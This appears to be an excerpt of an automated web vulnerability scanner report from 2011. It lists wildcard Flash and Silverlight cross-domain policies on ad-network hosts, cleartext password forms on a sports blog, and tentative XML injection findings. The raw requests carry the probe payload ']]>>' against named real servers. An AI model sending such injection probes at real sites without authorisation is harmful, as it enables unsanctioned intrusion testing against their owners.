Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Mon, 13 Jun 2011 11:19:29 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.2. http://d.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:09:09 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.3. http://dg.specificclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dg.specificclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: dg.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 13 Jun 2011 11:13:31 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.4. http://load.exelator.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-406413108"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Mon, 13 Jun 2011 11:08:21 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

5.5. http://m.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:11:08 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.6. http://matrix.hbo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://matrix.hbo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: matrix.hbo.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Server: Omniture DC/2.0.0
xserver: www431
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.7. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 13 Jun 2011 11:20:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.8. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 20 Jun 2011 11:24:18 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

5.9. http://segment-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 13 Jun 2011 11:16:03 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.10. http://server.cpmstar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://server.cpmstar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: server.cpmstar.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/xml
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 01 Feb 2011 16:46:45 GMT
Accept-Ranges: bytes
ETag: "a8c96c9c2fc2cb1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADM DEVa PSAa PSDa OUR OTR IND UNI NAV STA"
Date: Mon, 13 Jun 2011 11:25:26 GMT
Content-Length: 263
Connection: close
Via: 1.1 AN-AMP_TM uproxy-5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control
...[SNIP]...

5.11. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 11:09:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 02 Jun 2011 19:57:44 GMT
ETag: "6f0873e-ca-4a4c00ce73e00"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

5.12. http://ad.wsod.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:03 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "5df143-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

5.13. http://ads.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Mon, 13 Jun 2011 11:12:44 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

5.14. http://my.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.yahoo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.15. http://s.media-imdb.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://s.media-imdb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s.media-imdb.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:20 GMT
Server: Server
Last-Modified: Sun, 12 Jun 2011 05:36:36 GMT
ETag: "20e-2fa9e100"
Accept-Ranges: bytes
Content-Length: 526
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 11:24:20 GMT
Cneonction: close
Content-Type: text/xml
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.imdb.de" />
<allow-access-from domain="*.imdb.es" />
<allow-access-from domain="*.imdb.it" />
<allow-access-from domain="*.imdb.fr" />
<allow-access-from domain="*.imdb.pt" />
<allow-access-from domain="*.imdb.me" />
<allow-access-from domain="*.media-imdb.com" />
...[SNIP]...

6. Silverlight cross-domain policy previous next
There are 2 instances of this issue:

http://matrix.hbo.com/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://matrix.hbo.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://matrix.hbo.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: matrix.hbo.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Server: Omniture DC/2.0.0
xserver: www267
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.2. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 20 Jun 2011 11:24:18 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7. Cleartext submission of password previous next
There are 4 instances of this issue:

/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
/2011/6/3/2205973/a-message-from-the-rest-of-us
/fanposts
/mavericks-tickets

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

7.1. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sbnation.com/login

The form contains the following password field:

password

Request

Response

7.2. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/2011/6/3/2205973/a-message-from-the-rest-of-us

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sbnation.com/login

The form contains the following password field:

password

Request

GET /2011/6/3/2205973/a-message-from-the-rest-of-us HTTP/1.1
Host: www.mavsmoneyball.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/fanposts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219526021.1307962895.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1307962895.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9986623865399813494; __qca=P0-542977190-1307962939764; OX_plg=swf,sl,shk; __utma=219526021.1991767657.1307962895.1307962895.1307962895.1; __utmc=219526021; __utmb=219526021.2.10.1307962895; __utma=1.600751604.1307962895.1307962895.1307962895.1; __utmc=1; __utmb=1.2.10.1307962895

Response

7.3. http://www.mavsmoneyball.com/fanposts previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/fanposts

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sbnation.com/login

The form contains the following password field:

password

Request

GET /fanposts HTTP/1.1
Host: www.mavsmoneyball.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219526021.1307962895.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=219526021.1991767657.1307962895.1307962895.1307962895.1; __utmc=219526021; __utmb=219526021.1.10.1307962895; __utmz=1.1307962895.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.600751604.1307962895.1307962895.1307962895.1; __utmc=1; __utmb=1.1.10.1307962895; _jsuid=9986623865399813494; __qca=P0-542977190-1307962939764

Response

7.4. http://www.mavsmoneyball.com/mavericks-tickets previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mavsmoneyball.com
Path:	/mavericks-tickets

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.sbnation.com/login

The form contains the following password field:

password

Request

GET /mavericks-tickets HTTP/1.1
Host: www.mavsmoneyball.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=219526021.1307962895.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1307962895.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9986623865399813494; __qca=P0-542977190-1307962939764; OX_plg=swf,sl,shk; __utma=219526021.1991767657.1307962895.1307962895.1307962895.1; __utmc=219526021; __utmb=219526021.2.10.1307962895; __utma=1.600751604.1307962895.1307962895.1307962895.1; __utmc=1; __utmb=1.2.10.1307962895

Response

8. XML injection previous next
There are 19 instances of this issue:

http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 1]
http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 2]
http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 3]
http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 4]
http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 5]
http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 6]
http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 7]
http://load.exelator.com/load/ [REST URL parameter 1]
http://pixel.quantserve.com/seg/r [REST URL parameter 1]
http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]
http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]
http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 1]
http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 2]
http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 3]
http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 1]
http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 2]
http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 3]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

8.1. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn.bleacherreport.net
Path:	/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images_root]]>>/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg?1267147007 HTTP/1.1
Host: cdn.bleacherreport.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Mon, 13 Jun 2011 11:09:53 GMT
Server: AmazonS3
x-amz-id-2: M2IHpOLTycwqZqZJxZmZ00h6OY626wOZyo1lSiWtTvD/QctPgDy44m3mwkW4hdt3
x-amz-request-id: CDD62DB752F27849
Content-Length: 342

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images_root]]>>/images/photos/000/827/871/96813877.jpg.17952_crop_340
...[SNIP]...

8.2. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn.bleacherreport.net
Path:	/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images_root/images]]>>/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg?1267147007 HTTP/1.1
Host: cdn.bleacherreport.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Mon, 13 Jun 2011 11:10:28 GMT
Server: AmazonS3
x-amz-id-2: LHR6EB+n0zr83hAW8caJJurFUBFTfhxztQEQQdO6HE6bHeur+8QUJ6GKvpxqgUgL
x-amz-request-id: 9AC33743DD644519
Content-Length: 342

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images_root/images]]>>/photos/000/827/871/96813877.jpg.17952_crop_340
...[SNIP]...

8.3. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn.bleacherreport.net
Path:	/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images_root/images/photos]]>>/000/827/871/96813877.jpg.17952_crop_340x234.jpg?1267147007 HTTP/1.1
Host: cdn.bleacherreport.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Mon, 13 Jun 2011 11:11:03 GMT
Server: AmazonS3
x-amz-id-2: 1WmQprSKNxEIdljWIGdf6xbJT4MDmscTSPvD2qT7tyqmWOX+rfDbNA1NI1QlBfC4
x-amz-request-id: A653169EE30C2A86
Content-Length: 342

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images_root/images/photos]]>>/000/827/871/96813877.jpg.17952_crop_340
...[SNIP]...

8.4. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn.bleacherreport.net
Path:	/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images_root/images/photos/000]]>>/827/871/96813877.jpg.17952_crop_340x234.jpg?1267147007 HTTP/1.1
Host: cdn.bleacherreport.net
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
